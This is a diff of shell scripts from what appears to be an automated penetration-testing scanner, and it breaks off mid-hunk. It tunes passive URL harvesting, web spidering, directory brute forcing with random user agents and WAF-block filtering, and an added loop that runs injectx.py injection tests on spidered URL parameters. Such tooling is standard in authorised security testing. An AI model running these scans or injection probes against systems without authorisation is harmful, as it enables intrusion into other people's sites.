@ -227,40 +209,31 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$VERBOSE" == "1" ]]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2019-51-index?url=*.$TARGET&output=json" | jq -r .url | egrep -v "null" | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null$RESET"
|
||||
fi
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2019-51-index?url=*.$TARGET&output=json" | jq -r .url | egrep -v "null" | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2019-51-index?url=*.$TARGET&output=json" | jq -r .url | egrep -v "null" | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null | head -n 250
|
||||
fi
|
||||
if [[ "$WAYBACKMACHINE" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$VERBOSE" == "1" ]]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null$RESET"
|
||||
fi
|
||||
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null
|
||||
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null | head -n 250
|
||||
fi
|
||||
if [[ "$HACKERTARGET" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED FETCHING HACKERTARGET URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -sX GET "http://api.hackertarget.com/pagelinks/?q=http://$TARGET" | egrep -v "API count|no links found|input url is invalid|API count|no links found|input url is invalid" | tee $LOOT_DIR/web/hackertarget-http-$TARGET.txt 2> /dev/null
|
||||
curl -sX GET "http://api.hackertarget.com/pagelinks/?q=http://$TARGET" | egrep -v "API count|no links found|input url is invalid|API count|no links found|input url is invalid" | tee $LOOT_DIR/web/hackertarget-http-$TARGET.txt 2> /dev/null | head -n 250
|
||||
echo " "
|
||||
fi
|
||||
if [[ "$GUA" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED FETCHING GUA URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
gau2 -subs $TARGET | tee $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null
|
||||
gau2 -subs $TARGET | tee $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null | head -n 250
|
||||
fi
|
||||
if [[ "$BLACKWIDOW" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$VERBOSE" == "1" ]]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN blackwidow -u http://$TARGET:80 -l 1 $RESET"
|
||||
fi
|
||||
touch $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cp $LOOT_DIR/web/spider-$TARGET.txt $LOOT_DIR/web/spider-$TARGET.bak 2>/dev/null
|
||||
blackwidow -u http://$TARGET:80 -l 1 -v n
|
||||
|
|
@ -281,6 +254,7 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
cat $LOOT_DIR/web/spider-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
fi
|
||||
fi
|
||||
source $INSTALL_DIR/modes/static-grep-search.sh
|
||||
if [[ "$WEB_JAVASCRIPT_ANALYSIS" == "1" ]]; then
|
||||
source $INSTALL_DIR/modes/javascript-analysis.sh
|
||||
fi
|
||||
|
|
@ -288,13 +262,10 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$VERBOSE" == "1" ]]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_STEALTH -x $WEB_BRUTE_EXCLUDE_CODES -F -e php,asp,aspx,bak,zip,tar.gz,html,htm $RESET"
|
||||
fi
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
touch $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
|
||||
cp $LOOT_DIR/web/dirsearch-$TARGET.txt $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_STEALTH -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_STEALTH -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
sort -u $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > $LOOT_DIR/web/dirsearch-$TARGET.sorted 2> /dev/null
|
||||
|
|
@ -320,9 +291,6 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
if [[ $DISTRO == "blackarch" ]]; then
|
||||
/bin/CutyCapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
else
|
||||
if [[ "$VERBOSE" == "1" ]]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null$RESET"
|
||||
fi
|
||||
cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
fi
|
||||
fi
|
||||
|
|
@ -341,10 +309,6 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$VERBOSE" == "1" ]]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET.txt 2> /dev/null$RESET"
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl --connect-timeout=5 --max-time 3 -I -s -R https://$TARGET | tee $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null$RESET"
|
||||
fi
|
||||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=10 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 10 -I -s --insecure -R https://$TARGET | tee $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -s -R -L --insecure https://$TARGET > $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null
|
||||
|
|
@ -398,40 +362,31 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$VERBOSE" == "1" ]]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2019-51-index?url=*.$TARGET&output=json" | jq -r .url | egrep -v "null" | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null$RESET"
|
||||
fi
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2019-51-index?url=*.$TARGET&output=json" | jq -r .url | egrep -v "null" | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2019-51-index?url=*.$TARGET&output=json" | jq -r .url | egrep -v "null" | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null | head -n 250
|
||||
fi
|
||||
if [[ "$WAYBACKMACHINE" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$VERBOSE" == "1" ]]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null$RESET"
|
||||
fi
|
||||
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null
|
||||
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null | head -n 250
|
||||
fi
|
||||
if [[ "$HACKERTARGET" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED FETCHING HACKERTARGET URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -sX GET "http://api.hackertarget.com/pagelinks/?q=https://$TARGET" | egrep -v "API count|no links found|input url is invalid|API count|no links found|input url is invalid" | tee $LOOT_DIR/web/hackertarget-https-$TARGET.txt 2> /dev/null
|
||||
curl -sX GET "http://api.hackertarget.com/pagelinks/?q=https://$TARGET" | egrep -v "API count|no links found|input url is invalid|API count|no links found|input url is invalid" | tee $LOOT_DIR/web/hackertarget-https-$TARGET.txt 2> /dev/null | head -n 250
|
||||
echo " "
|
||||
fi
|
||||
if [[ "$GUA" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED FETCHING GUA URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
gau2 -subs $TARGET | tee $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null
|
||||
gau2 -subs $TARGET | tee $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null | head -n 250
|
||||
fi
|
||||
if [[ "$BLACKWIDOW" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$VERBOSE" == "1" ]]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN blackwidow -u https://$TARGET:443 -l 1 $RESET"
|
||||
fi
|
||||
touch $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cp $LOOT_DIR/web/spider-$TARGET.txt $LOOT_DIR/web/spider-$TARGET.bak 2>/dev/null
|
||||
blackwidow -u https://$TARGET:443 -l 1 -v n
|
||||
|
|
@ -451,6 +406,7 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
cat $LOOT_DIR/web/spider-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
fi
|
||||
fi
|
||||
source $INSTALL_DIR/modes/static-grep-search.sh
|
||||
if [[ "$WEB_JAVASCRIPT_ANALYSIS" == "1" ]]; then
|
||||
source $INSTALL_DIR/modes/javascript-analysis.sh
|
||||
fi
|
||||
|
|
@ -458,13 +414,10 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$VERBOSE" == "1" ]]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_STEALTH -x $WEB_BRUTE_EXCLUDE_CODES -F -e php,asp,aspx,bak,zip,tar.gz,html,htm $RESET"
|
||||
fi
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
touch $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
|
||||
cp $LOOT_DIR/web/dirsearch-$TARGET.txt $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_STEALTH -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_STEALTH -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
sort -u $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > $LOOT_DIR/web/dirsearch-$TARGET.sorted 2> /dev/null
|
||||
|
|
@ -480,9 +433,6 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
gobuster -u https://$TARGET -w $WEB_BRUTE_STEALTH -e | tee $LOOT_DIR/web/webbrute-$TARGET-https-stealth.txt
|
||||
sort -u $LOOT_DIR/web/webbrute-$TARGET-*.txt 2> /dev/null > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$VERBOSE" == "1" ]]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN wget https://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-https.txt 2> /dev/null$RESET"
|
||||
fi
|
||||
wget https://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-https.txt 2> /dev/null
|
||||
egrep -v '<|>|;|(|)' $LOOT_DIR/web/robots-$TARGET-https.txt | tee $LOOT_DIR/web/robots-$TARGET-https.txt
|
||||
fi
|
||||
|
|
@ -490,9 +440,6 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING SSL/TLS INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$VERBOSE" == "1" ]]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN sslscan --no-failed $TARGET | tee $LOOT_DIR/web/sslscan-$TARGET.raw 2> /dev/null$RESET"
|
||||
fi
|
||||
sslscan --no-failed $TARGET | tee $LOOT_DIR/web/sslscan-$TARGET.raw 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/sslscan-$TARGET.raw > $LOOT_DIR/web/sslscan-$TARGET.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/sslscan-$TARGET.raw 2> /dev/null
|
||||
|
|
@ -510,9 +457,6 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
if [[ $DISTRO == "blackarch" ]]; then
|
||||
/bin/CutyCapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
else
|
||||
if [[ "$VERBOSE" == "1" ]]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null$RESET"
|
||||
fi
|
||||
cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
fi
|
||||
fi
|
||||
|
|
@ -533,16 +477,13 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
SSL="true"
|
||||
PORT="443"
|
||||
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
|
||||
|
||||
for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do
|
||||
source $file
|
||||
done
|
||||
|
||||
source $INSTALL_DIR/modes/sc0pe-network-scan.sh
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
source $INSTALL_DIR/modes/sc0pe.sh
|
||||
fi
|
||||
|
||||
source $INSTALL_DIR/modes/sc0pe.sh
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
|
|
|
|||
|
|
@ -165,25 +165,25 @@ if [[ "$MODE" = "webporthttp" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2019-51-index?url=*.$TARGET&output=json" | jq -r .url | egrep -v "null" | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2019-51-index?url=*.$TARGET&output=json" | jq -r .url | egrep -v "null" | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null | head -n 250
|
||||
fi
|
||||
if [[ "$WAYBACKMACHINE" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null
|
||||
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null | head -n 250
|
||||
fi
|
||||
if [[ "$HACKERTARGET" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED FETCHING HACKERTARGET URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -sX GET "http://api.hackertarget.com/pagelinks/?q=http://$TARGET" | egrep -v "API count|no links found|input url is invalid|API count|no links found|input url is invalid" | tee $LOOT_DIR/web/hackertarget-http-$TARGET.txt 2> /dev/null
|
||||
curl -sX GET "http://api.hackertarget.com/pagelinks/?q=http://$TARGET" | egrep -v "API count|no links found|input url is invalid|API count|no links found|input url is invalid" | tee $LOOT_DIR/web/hackertarget-http-$TARGET.txt 2> /dev/null | head -n 250
|
||||
fi
|
||||
if [[ "$GUA" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED FETCHING GUA URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
gau2 -subs $TARGET | tee $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null
|
||||
gau2 -subs $TARGET | tee $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null | head -n 250
|
||||
fi
|
||||
if [[ "$BLACKWIDOW" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
@ -191,7 +191,7 @@ if [[ "$MODE" = "webporthttp" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
touch $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cp $LOOT_DIR/web/spider-$TARGET.txt $LOOT_DIR/web/spider-$TARGET.bak 2>/dev/null
|
||||
blackwidow -u http://$TARGET:$PORT -l 3 -s y -v n 2> /dev/null
|
||||
blackwidow -u http://$TARGET:$PORT -l 3 -v n 2> /dev/null
|
||||
cp -f /usr/share/blackwidow/"$TARGET"_"$PORT"/"$TARGET"_"$PORT"-*.txt $LOOT_DIR/web/ 2>/dev/null
|
||||
cat /usr/share/blackwidow/"$TARGET"_*/"$TARGET"_*-urls-sorted.txt > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
|
|
@ -206,6 +206,12 @@ if [[ "$MODE" = "webporthttp" ]]; then
|
|||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/spider-new-$TARGET.txt"
|
||||
fi
|
||||
fi
|
||||
if [[ "$INJECTX" == "1" ]]; then
|
||||
rm -f $LOOT_DIR/web/injectx-$TARGET-http.txt 2> /dev/null
|
||||
#cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep 'http\:' | xargs -P $THREADS -r -n 1 -I '{}' injectx.py -u '{}' -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-http.txt
|
||||
for a in `cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep "http\:" | cut -d '?' -f2 | cut -d '=' -f1 | sort -u`; do for b in `grep $a $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "http\:" | head -n 1`; do injectx.py -u $b -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-http.txt; done; done;
|
||||
fi
|
||||
source $INSTALL_DIR/modes/static-grep-search.sh
|
||||
if [[ "$WEB_JAVASCRIPT_ANALYSIS" == "1" ]]; then
|
||||
source $INSTALL_DIR/modes/javascript-analysis.sh
|
||||
fi
|
||||
|
|
@ -216,7 +222,7 @@ if [[ "$MODE" = "webporthttp" ]]; then
|
|||
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -x $WEB_BRUTE_EXCLUDE_CODES -F -e "$WEB_BRUTE_EXTENSIONS" -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -x $WEB_BRUTE_EXCLUDE_CODES -F -e "$WEB_BRUTE_EXTENSIONS" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-port$PORT-common.txt
|
||||
|
|
@ -227,7 +233,7 @@ if [[ "$MODE" = "webporthttp" ]]; then
|
|||
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
